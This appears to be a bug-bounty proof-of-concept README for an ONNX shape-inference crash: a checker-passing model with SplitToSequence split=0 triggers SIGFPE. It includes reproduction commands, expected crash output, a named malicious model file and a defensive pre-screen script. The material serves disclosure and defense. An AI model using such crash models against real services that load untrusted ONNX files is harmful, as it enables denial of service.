---
license: mit
tags:
- security
- onnx
- model-file-format
- poc
- huntr
---

# ONNX SplitToSequence scalar split=0 SIGFPE PoC

This repository contains the proof of concept and evidence files for an ONNX `SplitToSequence` shape-inference crash.

## Summary

A checker-passing ONNX model can set the optional `SplitToSequence` `split` input to a scalar `INT32` initializer with value `0`. ONNX shape inference then evaluates `splitDimValue % splitSizes[0]` in native code without checking that the scalar split value is positive. This terminates the process with `SIGFPE`.

Tested package:

```text
onnx==1.22.0
numpy==1.26.4
```

## Reproduce

```bash
python3 -m venv /tmp/onnx-split-poc
/tmp/onnx-split-poc/bin/python -m pip install --upgrade pip
/tmp/onnx-split-poc/bin/python -m pip install -r requirements.txt
/tmp/onnx-split-poc/bin/python onnx_split_to_sequence_zero_split_sigfpe_poc.py --out-dir /tmp/onnx-split-poc-output
```

Expected result:

```text
== control_split_2.onnx split=2 ==
loaded=control_split_2.onnx
checker_passed
shape_inference_returned
returncode=0

== malicious_split_0.onnx split=0 ==
loaded=malicious_split_0.onnx
checker_passed
Fatal Python error: Floating point exception
...
returncode=-8
```

For native debugger capture:

```bash
gdb --args /tmp/onnx-split-poc/bin/python onnx_split_to_sequence_zero_split_sigfpe_poc.py --out-dir /tmp/onnx-split-poc-output --direct-crash
```

## Files

- `onnx_split_to_sequence_zero_split_sigfpe_poc.py` - repeatable PoC.
- `control_split_2.onnx` - valid control model using scalar `split=2`.
- `malicious_split_0.onnx` - checker-passing crash model using scalar `split=0`.
- `record-demo-output.txt` - recorded PoC output.
- `gdb-backtrace.txt` - native backtrace showing `SIGFPE`.
- `source-sequence-utils-v1.22.0.txt` - vulnerable release source snippet.
- `source-sequence-utils-main.txt` - current `main` source snippet.
- `duplicate-check.md` - public duplicate check notes.
- `duplicate-check-playwright.json` - raw Huntr dedup checker output.
- `environment.txt` - tested environment.
- `SHA256SUMS.txt` - file hashes.
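
A pre-screen for the condition described in the Summary, as an added example that is not part of this repository's PoC: it flags `SplitToSequence` nodes whose `split` input is an integer initializer holding a non-positive value, so an untrusted model can be rejected before shape inference runs. It reads only standard `ModelProto` fields (the result of `onnx.load(path)` can be passed in), covers top-level graph initializers only, and the `sample_*` helpers are hypothetical names that build constructed stand-in objects so the block runs without `onnx` installed.

```python
import struct
from types import SimpleNamespace as NS

INT32, INT64 = 6, 7  # TensorProto.DataType enum values

def tensor_ints(t):
    """Decode an INT32/INT64 TensorProto-like object into a list of ints."""
    if t.data_type not in (INT32, INT64):
        return None  # not an integer tensor, nothing to check here
    if t.raw_data:  # raw_data is little-endian packed bytes
        fmt, size = ("i", 4) if t.data_type == INT32 else ("q", 8)
        n = len(t.raw_data) // size
        return list(struct.unpack("<%d%s" % (n, fmt), t.raw_data[: n * size]))
    return list(t.int32_data if t.data_type == INT32 else t.int64_data)

def find_bad_splits(model):
    """Return (node_name, split_input, values) for every SplitToSequence
    node whose 'split' initializer contains a value <= 0."""
    inits = {t.name: t for t in model.graph.initializer}
    findings = []
    for node in model.graph.node:
        if node.op_type != "SplitToSequence" or len(node.input) < 2:
            continue  # 'split' is the optional second input
        init = inits.get(node.input[1])
        if init is None:
            continue  # split is computed at runtime, not a static initializer
        values = tensor_ints(init)
        if values and any(v <= 0 for v in values):
            findings.append((node.name, node.input[1], values))
    return findings

def sample_tensor(dtype, ints=(), raw=b""):
    """Constructed stand-in for a TensorProto named 'split'."""
    return NS(name="split", data_type=dtype, raw_data=raw,
              int32_data=list(ints) if dtype == INT32 else [],
              int64_data=list(ints) if dtype == INT64 else [])

def sample_model(split_tensor):
    """Constructed stand-in for a ModelProto with one SplitToSequence node."""
    node = NS(op_type="SplitToSequence", name="split_node",
              input=["x", "split"])
    return NS(graph=NS(node=[node], initializer=[split_tensor]))

if __name__ == "__main__":
    for label, t in [("split=2", sample_tensor(INT32, [2])),
                     ("split=0", sample_tensor(INT32, [0]))]:
        print(label, find_bad_splits(sample_model(t)))
```

A non-empty result is a reason to refuse the model before calling shape inference on it in-process.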